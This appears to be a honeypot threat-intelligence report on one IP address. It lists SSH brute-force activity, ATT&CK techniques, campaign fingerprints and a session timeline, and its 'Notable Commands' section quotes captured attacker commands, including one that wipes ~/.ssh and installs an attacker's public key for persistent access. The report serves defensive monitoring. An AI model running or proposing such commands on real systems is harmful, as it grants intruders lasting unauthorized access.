IntrusionLabs IntrusionLabs
← Back to feed

123.58.203.202

TAGGED SUSPICIOUS how we decide →
Threat Confidence
67%
Location
🇮🇳 IN / Mumbai
ASN
AS135377 · UCLOUD INFORMATION TECHNOLOGY HK LIMITED
Cloud Provider
Total Events
242
Above average by volume
Agent Count
2
First / Last Seen
2026-05-22 02:41 — 2026-06-01 06:47
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Command and Control
T1105
External Corroboration
Blocklist.de
Reported 2026-06-01 09:03
blocklist_de:reported
Campaigns
HASSH f555226df196… — SSH-2.0-libssh_0.9.6 (904 IPs, 84 countries) HASSH Active high 🇨🇳 CN
904 IPs 382602 events
http:scanssh:bruteforce
2026-02-25 — ongoing · 904 IPs are running an identical SSH client (HASSH fingerprint f555226df196…). Top network: UCLOUD INFORMATION TECHNOLOGY HK LIMITED …
AS135377 UCLOUD INFORMATION TECHNOLOGY HK LIMITED ASN Active medium 🇭🇰 HK
52 IPs 21916 events
ftp:bruteforcehttp:scanmysql:bruteforcessh:bruteforce
2026-02-18 — ongoing · 52 IPs from the same network (UCLOUD INFORMATION TECHNOLOGY HK LIMITED, AS135377) were active during overlapping time periods. …
Session Forensics
malware_dropper ×9 credential_probe ×16 opportunistic_bruter ×9
Sessions
34 (18 with login)
Avg Depth Score
0.49
Commands Executed
27
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
f555226df1963d1d3c09daf865abdc9a
SSH Client
SSH-2.0-libssh_0.9.6
Evidence Timeline
Opportunistic Bruter a6d9d58d44a6 w4m_singapore_01 · 2026-06-01 06:47
1 50%
Loading events...
Malware Dropper 9d248f008ef5 w4m_singapore_01 · 2026-06-01 06:47
3 1 1 100%
Loading events...
Credential Probe cc93b26c5b84 w4m_singapore_01 · 2026-06-01 06:47
1 20%
Loading events...
Credential Probe 31ef8eca0236 w4m_singapore_01 · 2026-06-01 06:45
1 20%
Loading events...
Opportunistic Bruter 1be71893530c w4m_singapore_01 · 2026-06-01 06:43
1 50%
Loading events...
Malware Dropper 44126957c8c6 w4m_singapore_01 · 2026-06-01 06:43
3 1 1 100%
Loading events...
Credential Probe bee48c4db847 w4m_singapore_01 · 2026-06-01 06:43
1 20%
Loading events...
Credential Probe 62fb55575a90 w4m_singapore_01 · 2026-06-01 06:42
1 20%
Loading events...
Opportunistic Bruter 5094d7154ee1 w4m_singapore_01 · 2026-06-01 06:40
1 50%
Loading events...
Malware Dropper 240ddff7d6b6 w4m_singapore_01 · 2026-06-01 06:40
3 1 1 100%
Loading events...
Credential Probe 8944452f151d w4m_singapore_01 · 2026-06-01 06:40
1 20%
Loading events...
Opportunistic Bruter 53c15b91bf1b w4m_singapore_01 · 2026-06-01 06:39
1 50%
Loading events...
Malware Dropper 70dc7fd820cc w4m_singapore_01 · 2026-06-01 06:39
3 1 1 100%
Loading events...
Credential Probe 0a99f68f7d7e w4m_singapore_01 · 2026-06-01 06:39
1 20%
Loading events...
Credential Probe c17451725826 w4m_singapore_01 · 2026-06-01 06:37
1 20%
Loading events...
Credential Probe 9e2f6ee14dbf w4m_singapore_01 · 2026-06-01 06:36
1 20%
Loading events...
Opportunistic Bruter da4b99df6d34 w4m_singapore_01 · 2026-06-01 06:34
1 50%
Loading events...
Malware Dropper 5d53c3b92b3f w4m_singapore_01 · 2026-06-01 06:34
3 1 1 100%
Loading events...
Credential Probe 0a824134c282 w4m_singapore_01 · 2026-06-01 06:34
1 20%
Loading events...
Opportunistic Bruter 9b6134e07f2b w4m_singapore_01 · 2026-06-01 06:33
1 50%
Loading events...
Malware Dropper 7bc70efdf474 w4m_singapore_01 · 2026-06-01 06:33
3 1 1 100%
Loading events...
Credential Probe 3911d163a522 w4m_singapore_01 · 2026-06-01 06:33
1 20%
Loading events...
Opportunistic Bruter 791fa376f406 w4m_singapore_01 · 2026-06-01 06:31
1 50%
Loading events...
Malware Dropper 3e08f3096cab w4m_singapore_01 · 2026-06-01 06:31
3 1 1 100%
Loading events...
Credential Probe 72e3a7c39977 w4m_singapore_01 · 2026-06-01 06:31
1 20%
Loading events...
Opportunistic Bruter 2e90dbd1c918 w4m_singapore_01 · 2026-06-01 06:30
1 50%
Loading events...
Malware Dropper aedce041b3b3 w4m_singapore_01 · 2026-06-01 06:30
3 1 1 100%
Loading events...
Credential Probe 3954fc131139 w4m_singapore_01 · 2026-06-01 06:30
1 20%
Loading events...
Credential Probe 9c107f62259b w4m_singapore_01 · 2026-06-01 06:28
1 20%
Loading events...
Credential Probe 8be14ee8b6ca w4m_singapore_01 · 2026-06-01 06:26
1 20%
Loading events...
Credential Probe 897b07df5d52 w4m_singapore_01 · 2026-06-01 06:20
1 20%
Loading events...
Opportunistic Bruter 721b62a51df8 w4m_seattle_01 · 2026-05-22 02:41
1 50%
Loading events...
Malware Dropper bed30ec82d42 w4m_seattle_01 · 2026-05-22 02:41
3 1 1 100%
Loading events...
Credential Probe 15bac0c12d5d w4m_seattle_01 · 2026-05-22 02:41
1 20%
Loading events...